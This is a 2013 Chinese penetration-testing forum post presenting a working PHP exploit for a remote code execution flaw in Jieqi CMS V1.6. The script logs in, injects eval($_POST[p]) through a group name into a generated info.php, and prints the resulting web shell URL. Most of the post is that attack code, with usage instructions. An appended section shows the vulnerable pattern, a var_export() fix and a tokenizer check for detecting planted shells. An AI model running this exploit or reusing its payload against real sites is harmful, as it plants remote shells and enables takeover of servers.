中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Jieqi (杰奇) CMS V1.6 PHP Code Execution 0day Vulnerability EXP

Author: admin    Time: 2013-2-23 11:28
Jieqi Website Management System (JIEQI CMS for short; China National Copyright Administration software registration no. 2006SR03382) is a modular website construction system featuring simplicity and flexibility, outstanding performance, and security and reliability. We offer the currently most popular Jieqi serialized-novel system, the Jieqi original-comics system and digital publishing solutions, and provide all kinds of website customization services.

This system has multiple remote security vulnerabilities; the one reported today is a remote code execution vulnerability in version 1.6, which should be more than two years old by now.
It requires a user account that can create a group (圈子).

<?php
print_r('
+---------------------------------------------------------------------------+
Jieqi CMS V1.6 PHP Code Injection Exploit
by flyh4t
mail: phpsec at hotmail dot com
team: http://www.wolvez.org
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */
if ($argc < 5) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path username password
host:      target server (ip/hostname)
path:      path to jieqicms
username:  a username who can create a group
password:  that user\'s password
Example:
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);                  // E_ERROR | E_WARNING | E_PARSE
ini_set('max_execution_time', 0);

$host     = $argv[1];
$path     = $argv[2];
$username = $argv[3];
$password = $argv[4];

/* step 1: log in and store the session cookie */
$cookie_jar_index = 'cookie.txt';
$url1 = "http://$host/$path/login.php";
// "submit" is the GBK-encoded "登录" button label with &#160; padding, URL-encoded exactly as the browser sends it
$params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1";
$curl1 = curl_init();
curl_setopt($curl1, CURLOPT_URL, $url1);
curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index);
curl_setopt($curl1, CURLOPT_POST, 1);
curl_setopt($curl1, CURLOPT_POSTFIELDS, $params);
curl_setopt($curl1, CURLOPT_RETURNTRANSFER, 1);
$data1 = curl_exec($curl1);
if ($data1 === FALSE) {
    echo "cURL Error: " . curl_error($curl1);   // the original referenced an undefined $ch here
    exit('exploit failed');
}
curl_close($curl1);

/* step 2: create a group whose name closes the quoted string the CMS writes into info.php
   and appends eval($_POST[p]); the trailing // comments out the rest of that line */
$boundary = '---------------------------23281168279961';
$fields = array(
    'gname'  => "';eval(\$_POST[p]);//flyh4t",
    'gcatid' => '1',
    'gaudit' => '1',
    'gbrief' => '1',
);
$params = '';
foreach ($fields as $name => $value) {
    $params .= "--$boundary\r\n"
             . "Content-Disposition: form-data; name=\"$name\"\r\n\r\n"
             . "$value\r\n";
}
$params .= "--$boundary--\r\n";

$url2 = "http://$host/$path/modules/group/create.php";
$curl2 = curl_init();
$header = array("Content-Type: multipart/form-data; boundary=$boundary");
curl_setopt($curl2, CURLOPT_URL, $url2);
curl_setopt($curl2, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index);
curl_setopt($curl2, CURLOPT_POST, 1);
curl_setopt($curl2, CURLOPT_POSTFIELDS, $params);
curl_setopt($curl2, CURLOPT_RETURNTRANSFER, 1);
$resp = curl_exec($curl2);           // $resp holds the response body
curl_close($curl2);

/* step 3: the response carries g=<id> for the new group; its info.php sits under that id */
if (!preg_match('/g=([0-9]{1,4})/', $resp, $shell)) {
    exit("could not find the new group id in the response; exploit failed\r\n");
}
//print_r($shell);
//print_r($resp);
$url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php";
echo "view your shell here (password: p)\r\n";
echo $url;
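The gname payload (`';eval($_POST[p]);//`) only works if create.php writes the group name into info.php as the body of a single-quoted PHP string literal. The post does not show that server-side code, so the following is an added illustration, not Jieqi CMS's own create.php: the write pattern the payload depends on, a hardened version that serialises the values with var_export() instead of string concatenation, and a token-level check that tells the two generated files apart without executing either. Function names, the `$group` variable and the temp-file paths are hypothetical.

```php
<?php
// Added illustration, not Jieqi CMS code: the write pattern the exploit's
// gname payload depends on, a hardened version, and a non-executing check.
// Function names, the $group variable and the file paths are hypothetical.

// Vulnerable pattern: user input spliced into PHP source as a quoted literal.
// gname = ';eval($_POST[p]);//  closes the literal and appends a statement.
function write_group_info_vulnerable(string $file, string $gname, int $gcatid): void
{
    $src = "<?php\n"
         . "\$group['gname']  = '$gname';\n"
         . "\$group['gcatid'] = '$gcatid';\n";
    file_put_contents($file, $src);
}

// Hardened: let var_export() serialise the array. It escapes ' and \ so the
// value is always read back as a string, never as code.
function write_group_info_hardened(string $file, string $gname, int $gcatid): void
{
    $group = array('gname' => $gname, 'gcatid' => $gcatid);
    $src = "<?php\n\$group = " . var_export($group, true) . ";\n";
    file_put_contents($file, $src);
}

// Check without executing: tokenize the generated file and count eval
// constructs. A data-only info.php must have none.
function count_eval_tokens(string $file): int
{
    $n = 0;
    foreach (token_get_all(file_get_contents($file)) as $tok) {
        if (is_array($tok) && $tok[0] === T_EVAL) {
            $n++;
        }
    }
    return $n;
}

$payload = "';eval(\$_POST[p]);//flyh4t";   // the gname value sent by the exploit
$dir  = sys_get_temp_dir();
$vuln = "$dir/info_vuln.php";
$safe = "$dir/info_safe.php";

write_group_info_vulnerable($vuln, $payload, 1);
write_group_info_hardened($safe, $payload, 1);

echo "vulnerable info.php:\n", file_get_contents($vuln), "\n";
echo "hardened info.php:\n",   file_get_contents($safe), "\n";
printf("T_EVAL tokens: vulnerable=%d hardened=%d\n",
       count_eval_tokens($vuln), count_eval_tokens($safe));
```

Run with the PHP CLI (the tokenizer extension is part of a default build). The vulnerable file tokenizes with an eval construct outside the intended assignment, while the hardened one contains the same payload only as a string literal. The same count_eval_tokens() pass over files/group/userdir/*/*/info.php on an existing 1.6 install would flag a group created with this payload, and var_export() (or storing the values in the database rather than in a PHP file) is the fix a patch would need.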




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2